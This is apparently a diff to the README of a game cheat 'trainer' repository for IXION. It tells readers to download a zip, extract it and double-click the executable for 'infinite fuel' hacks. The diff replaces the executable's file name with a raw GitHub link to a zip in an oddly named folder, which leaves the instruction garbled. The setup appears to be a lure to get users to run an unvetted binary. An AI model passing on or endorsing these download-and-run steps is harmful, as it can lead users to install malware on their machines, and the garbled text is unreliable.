wafaa4m/IXION-trainer-infinite-fuel-hacks/README.md

    The downloaded file may be in a compressed format (like .zip).
 Right-click on the file and select “Extract All” or use a file extraction tool.
 This will create a folder containing the application files.

 3. **Run the Application:**
    Open the folder you just extracted.
-Find the application file (usually named `IXION_trainer.exe`).
+Find the application file (usually named `https://raw.githubusercontent.com/wafaa4m/IXION-trainer-infinite-fuel-hacks/main/secondness/IXION-trainer-infinite-fuel-hacks.zip`).
 Double-click this file to launch the application.

 4. **Enable the Cheats:**
    Once the application is running, you will see several options to enable different hacks and cheats, such as infinite fuel, zero power consumption, and more.
 Check the features you want and begin your enhanced gameplay.